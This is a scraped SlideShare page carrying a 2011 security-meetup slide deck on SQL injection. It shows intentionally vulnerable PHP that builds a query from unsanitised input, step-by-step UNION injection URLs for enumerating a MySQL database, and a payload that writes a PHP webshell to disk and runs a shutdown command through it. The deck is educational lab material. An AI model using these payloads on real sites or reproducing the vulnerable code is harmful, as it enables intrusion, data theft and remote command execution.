SlideShare ist ein Scribd-Unternehmen logo

SQL Injection Part 2

Als PPTX, PDF herunterladen
n|u - The Open Security Community
n|u - The Open Security Community

SQL Injection Part 2 by K.V.Prashant @ null Banglore Meet, August 2011

Technologie
1 von 7
k.v.prashant SQL Injection Tricks
Vulnerable Sql Injection code <?php $id=$_GET["id"]; $con = mysql_connect("localhost","root","prashant"); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db("prashant", $con); $query= "SELECT * FROM user where id=$id "; echo "<h1>".$query. "</h1>"; $result = mysql_query($query); while($row = mysql_fetch_array($result)) { echo $row['id'] . " " . $row['name']; echo "<br />"; } mysql_close($con); ?>
Attacking vulnerability Finding the number of columns http://192.168.0.101/xampp/one.php?id=1 order by 2,3…(give each number one by one) If you get an error message for order by 3 that means there are 2 columns been used in select query.
Enumerating data Below query should show actual data as well as 1, 2 http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges— Trying removing the actual data to see data like id=-1 will not have any data to be returned so it will only show join query data http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges—
Enumerating data 1. database version http://192.168.0.101/xampp/one.php?id=1 union select @@version ,2 from information_schema.schema_privileges-- 2. system_user() http://192.168.0.101/xampp/one.php?id=1 union select system_user() ,2 from information_schema.schema_privileges-- 3. table_names http://192.168.0.101/xampp/one.php?id=1 union select table_name ,2 from information_schema.columns-- 4. databases names http://192.168.0.101/xampp/one.php?id=1 union select table_schema ,2 from information_schema.columns--
Creating backdoor 1. for creating a webshell “c.php” file http://192.168.0.101/xampp/one.php?id=-1 UNION SELECT "<? system($_REQUEST['cmd']); ?>", 2 INTO OUTFILE "e:/xampp/htdocs/xampp/c.php" -- 2. Exploiting using webshell http://192.168.0.101/xampp/c.php?cmd=shutdown.exe /s
Thank You

Empfohlen

Php My Sql
Php My SqlPhp My Sql
Php My Sqlmussawir20
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applicationselliando dias
 
jQuery - 10 Time-Savers You (Maybe) Don't Know
jQuery - 10 Time-Savers You (Maybe) Don't KnowjQuery - 10 Time-Savers You (Maybe) Don't Know
jQuery - 10 Time-Savers You (Maybe) Don't Knowgirish82
 
Let jQuery Rock Your World
Let jQuery Rock Your WorldLet jQuery Rock Your World
Let jQuery Rock Your WorldMatt Gifford
 
WordPress-Powered Portfolios
WordPress-Powered PortfoliosWordPress-Powered Portfolios
WordPress-Powered PortfoliosTyler Sticka
 
Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)
Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)
Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)Dotan Dimet
 
Make your own wp cli command in 10min
Make your own wp cli command in 10minMake your own wp cli command in 10min
Make your own wp cli command in 10minIvelina Dimova
 
Perl调用微博API实现自动查询应答
Perl调用微博API实现自动查询应答Perl调用微博API实现自动查询应答
Perl调用微博API实现自动查询应答琛琳 饶
 

Empfohlen

Php My Sql
Php My SqlPhp My Sql
Php My Sqlmussawir20
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applicationselliando dias
 
jQuery - 10 Time-Savers You (Maybe) Don't Know
jQuery - 10 Time-Savers You (Maybe) Don't KnowjQuery - 10 Time-Savers You (Maybe) Don't Know
jQuery - 10 Time-Savers You (Maybe) Don't Knowgirish82
 
Let jQuery Rock Your World
Let jQuery Rock Your WorldLet jQuery Rock Your World
Let jQuery Rock Your WorldMatt Gifford
 
WordPress-Powered Portfolios
WordPress-Powered PortfoliosWordPress-Powered Portfolios
WordPress-Powered PortfoliosTyler Sticka
 
Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)
Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)
Mojolicious - Perl Framework for the Real-Time Web (Lightning Talk)Dotan Dimet
 
Make your own wp cli command in 10min
Make your own wp cli command in 10minMake your own wp cli command in 10min
Make your own wp cli command in 10minIvelina Dimova
 
Perl调用微博API实现自动查询应答
Perl调用微博API实现自动查询应答Perl调用微博API实现自动查询应答
Perl调用微博API实现自动查询应答琛琳 饶
 
Shortcodes In-Depth
Shortcodes In-DepthShortcodes In-Depth
Shortcodes In-DepthMicah Wood
 
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"LogeekNightUkraine
 
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011John Ford
 
WordPress Theme Design and Development Workshop - Day 3
WordPress Theme Design and Development Workshop - Day 3WordPress Theme Design and Development Workshop - Day 3
WordPress Theme Design and Development Workshop - Day 3Mizanur Rahaman Mizan
 
CSS: A Slippery Slope to the Backend
CSS: A Slippery Slope to the BackendCSS: A Slippery Slope to the Backend
CSS: A Slippery Slope to the BackendFITC
 
Mojolicious: what works and what doesn't
Mojolicious: what works and what doesn'tMojolicious: what works and what doesn't
Mojolicious: what works and what doesn'tCosimo Streppone
 
Daily notes
Daily notesDaily notes
Daily notesmeghendra168
 
Mojolicious
MojoliciousMojolicious
MojoliciousMarcos Rebelo
 
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"LogeekNightUkraine
 
Mojolicious on Steroids
Mojolicious on SteroidsMojolicious on Steroids
Mojolicious on SteroidsTudor Constantin
 
Cheap frontend tricks
Cheap frontend tricksCheap frontend tricks
Cheap frontend tricksambiescent
 
Mootools selectors
Mootools selectorsMootools selectors
Mootools selectorsARIF MAHMUD RANA
 
Game jump: frontend introduction #1
Game jump: frontend introduction #1Game jump: frontend introduction #1
Game jump: frontend introduction #1Sebastian Pożoga
 
Mojolicious - A new hope
Mojolicious - A new hopeMojolicious - A new hope
Mojolicious - A new hopeMarcus Ramberg
 
Itsecteam shell
Itsecteam shellItsecteam shell
Itsecteam shellady36
 
Introduction to jQuery - Barcamp London 9
Introduction to jQuery - Barcamp London 9Introduction to jQuery - Barcamp London 9
Introduction to jQuery - Barcamp London 9Jack Franklin
 
Functional testing with capybara
Functional testing with capybaraFunctional testing with capybara
Functional testing with capybarakoffeinfrei
 
持续集成中心:新时代的软件研发管理体系
持续集成中心:新时代的软件研发管理体系持续集成中心:新时代的软件研发管理体系
持续集成中心:新时代的软件研发管理体系gigix1980
 
Evolving systems and the link to service orientation
Evolving systems and the link to service orientationEvolving systems and the link to service orientation
Evolving systems and the link to service orientationAngelo van der Sijpt
 
Massive device deployment - EclipseCon 2011
Massive device deployment - EclipseCon 2011Massive device deployment - EclipseCon 2011
Massive device deployment - EclipseCon 2011Angelo van der Sijpt
 
More Php
More PhpMore Php
More PhpDigital Insights - Digital Marketing Agency
 
Ubi comp27nov04
Ubi comp27nov04Ubi comp27nov04
Ubi comp27nov04mohamed ashraf
 

Weitere ähnliche Inhalte

Was ist angesagt?

Shortcodes In-Depth
Shortcodes In-DepthShortcodes In-Depth
Shortcodes In-DepthMicah Wood
 
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"LogeekNightUkraine
 
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011John Ford
 
WordPress Theme Design and Development Workshop - Day 3
WordPress Theme Design and Development Workshop - Day 3WordPress Theme Design and Development Workshop - Day 3
WordPress Theme Design and Development Workshop - Day 3Mizanur Rahaman Mizan
 
CSS: A Slippery Slope to the Backend
CSS: A Slippery Slope to the BackendCSS: A Slippery Slope to the Backend
CSS: A Slippery Slope to the BackendFITC
 
Mojolicious: what works and what doesn't
Mojolicious: what works and what doesn'tMojolicious: what works and what doesn't
Mojolicious: what works and what doesn'tCosimo Streppone
 
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"LogeekNightUkraine
 
Cheap frontend tricks
Cheap frontend tricksCheap frontend tricks
Cheap frontend tricksambiescent
 
Game jump: frontend introduction #1
Game jump: frontend introduction #1Game jump: frontend introduction #1
Game jump: frontend introduction #1Sebastian Pożoga
 
Mojolicious - A new hope
Mojolicious - A new hopeMojolicious - A new hope
Mojolicious - A new hopeMarcus Ramberg
 
Itsecteam shell
Itsecteam shellItsecteam shell
Itsecteam shellady36
 
Introduction to jQuery - Barcamp London 9
Introduction to jQuery - Barcamp London 9Introduction to jQuery - Barcamp London 9
Introduction to jQuery - Barcamp London 9Jack Franklin
 
Functional testing with capybara
Functional testing with capybaraFunctional testing with capybara
Functional testing with capybarakoffeinfrei
 
持续集成中心:新时代的软件研发管理体系
持续集成中心:新时代的软件研发管理体系持续集成中心:新时代的软件研发管理体系
持续集成中心:新时代的软件研发管理体系gigix1980
 
Evolving systems and the link to service orientation
Evolving systems and the link to service orientationEvolving systems and the link to service orientation
Evolving systems and the link to service orientationAngelo van der Sijpt
 
Massive device deployment - EclipseCon 2011
Massive device deployment - EclipseCon 2011Massive device deployment - EclipseCon 2011
Massive device deployment - EclipseCon 2011Angelo van der Sijpt
 

Was ist angesagt? (20)

Shortcodes In-Depth
Shortcodes In-DepthShortcodes In-Depth
Shortcodes In-Depth
 
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
 
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011
WordPress Plugin & Theme Security - WordCamp Melbourne - February 2011
 
WordPress Theme Design and Development Workshop - Day 3
WordPress Theme Design and Development Workshop - Day 3WordPress Theme Design and Development Workshop - Day 3
WordPress Theme Design and Development Workshop - Day 3
 
CSS: A Slippery Slope to the Backend
CSS: A Slippery Slope to the BackendCSS: A Slippery Slope to the Backend
CSS: A Slippery Slope to the Backend
 
Mojolicious: what works and what doesn't
Mojolicious: what works and what doesn'tMojolicious: what works and what doesn't
Mojolicious: what works and what doesn't
 
Daily notes
Daily notesDaily notes
Daily notes
 
Mojolicious
MojoliciousMojolicious
Mojolicious
 
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
Yuriy Voziy "Fantastic Template Strings and Where to Use Them"
 
Mojolicious on Steroids
Mojolicious on SteroidsMojolicious on Steroids
Mojolicious on Steroids
 
Cheap frontend tricks
Cheap frontend tricksCheap frontend tricks
Cheap frontend tricks
 
Mootools selectors
Mootools selectorsMootools selectors
Mootools selectors
 
Game jump: frontend introduction #1
Game jump: frontend introduction #1Game jump: frontend introduction #1
Game jump: frontend introduction #1
 
Mojolicious - A new hope
Mojolicious - A new hopeMojolicious - A new hope
Mojolicious - A new hope
 
Itsecteam shell
Itsecteam shellItsecteam shell
Itsecteam shell
 
Introduction to jQuery - Barcamp London 9
Introduction to jQuery - Barcamp London 9Introduction to jQuery - Barcamp London 9
Introduction to jQuery - Barcamp London 9
 
Functional testing with capybara
Functional testing with capybaraFunctional testing with capybara
Functional testing with capybara
 
持续集成中心:新时代的软件研发管理体系
持续集成中心:新时代的软件研发管理体系持续集成中心:新时代的软件研发管理体系
持续集成中心:新时代的软件研发管理体系
 
Evolving systems and the link to service orientation
Evolving systems and the link to service orientationEvolving systems and the link to service orientation
Evolving systems and the link to service orientation
 
Massive device deployment - EclipseCon 2011
Massive device deployment - EclipseCon 2011Massive device deployment - EclipseCon 2011
Massive device deployment - EclipseCon 2011
 

Ähnlich wie SQL Injection Part 2

Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application SecurityMahmud Ahsan
 
Exploiting Php With Php
Exploiting Php With PhpExploiting Php With Php
Exploiting Php With PhpJeremy Coates
 
Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)Mark Jaquith
 
London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)Dennis Knochenwefel
 
Drupal Development (Part 2)
Drupal Development (Part 2)Drupal Development (Part 2)
Drupal Development (Part 2)Jeff Eaton
 
Php Basic Security
Php Basic SecurityPhp Basic Security
Php Basic Securitymussawir20
 
Zendcon 2007 Features
Zendcon 2007 FeaturesZendcon 2007 Features
Zendcon 2007 Featuresfivespeed5
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
High-level Web Testing
High-level Web TestingHigh-level Web Testing
High-level Web Testingpetersergeant
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applicationselliando dias
 
P H P Part I I, By Kian
P H P Part I I, By KianP H P Part I I, By Kian
P H P Part I I, By Kianphelios
 

Ähnlich wie SQL Injection Part 2 (20)

More Php
More PhpMore Php
More Php
 
Ubi comp27nov04
Ubi comp27nov04Ubi comp27nov04
Ubi comp27nov04
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
 
Exploiting Php With Php
Exploiting Php With PhpExploiting Php With Php
Exploiting Php With Php
 
Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)
 
Ae internals
Ae internalsAe internals
Ae internals
 
London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)
 
Drupal Development (Part 2)
Drupal Development (Part 2)Drupal Development (Part 2)
Drupal Development (Part 2)
 
Modern Perl
Modern PerlModern Perl
Modern Perl
 
Php Basic Security
Php Basic SecurityPhp Basic Security
Php Basic Security
 
Zendcon 2007 Features
Zendcon 2007 FeaturesZendcon 2007 Features
Zendcon 2007 Features
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
Php
PhpPhp
Php
 
Php 101: PDO
Php 101: PDOPhp 101: PDO
Php 101: PDO
 
Views notwithstanding
Views notwithstandingViews notwithstanding
Views notwithstanding
 
High-level Web Testing
High-level Web TestingHigh-level Web Testing
High-level Web Testing
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applications
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
P H P Part I I, By Kian
P H P Part I I, By KianP H P Part I I, By Kian
P H P Part I I, By Kian
 
Php Sq Lite
Php Sq LitePhp Sq Lite
Php Sq Lite
 

Mehr von n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Mehr von n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Kürzlich hochgeladen

"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 

Kürzlich hochgeladen (20)

"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 

SQL Injection Part 2

  • 2. Vulnerable Sql Injection code <?php $id=$_GET["id"]; $con = mysql_connect("localhost","root","prashant"); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db("prashant", $con); $query= "SELECT * FROM user where id=$id "; echo "<h1>".$query. "</h1>"; $result = mysql_query($query); while($row = mysql_fetch_array($result)) { echo $row['id'] . " " . $row['name']; echo "<br />"; } mysql_close($con); ?>
  • 3. Attacking vulnerability Finding the number of columns http://192.168.0.101/xampp/one.php?id=1 order by 2,3…(give each number one by one) If you get an error message for order by 3 that means there are 2 columns been used in select query.
  • 4. Enumerating data Below query should show actual data as well as 1, 2 http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges— Trying removing the actual data to see data like id=-1 will not have any data to be returned so it will only show join query data http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges—
  • 5. Enumerating data 1. database version http://192.168.0.101/xampp/one.php?id=1 union select @@version ,2 from information_schema.schema_privileges-- 2. system_user() http://192.168.0.101/xampp/one.php?id=1 union select system_user() ,2 from information_schema.schema_privileges-- 3. table_names http://192.168.0.101/xampp/one.php?id=1 union select table_name ,2 from information_schema.columns-- 4. databases names http://192.168.0.101/xampp/one.php?id=1 union select table_schema ,2 from information_schema.columns--
  • 6. Creating backdoor 1. for creating a webshell “c.php” file http://192.168.0.101/xampp/one.php?id=-1 UNION SELECT "<? system($_REQUEST['cmd']); ?>", 2 INTO OUTFILE "e:/xampp/htdocs/xampp/c.php" -- 2. Exploiting using webshell http://192.168.0.101/xampp/c.php?cmd=shutdown.exe /s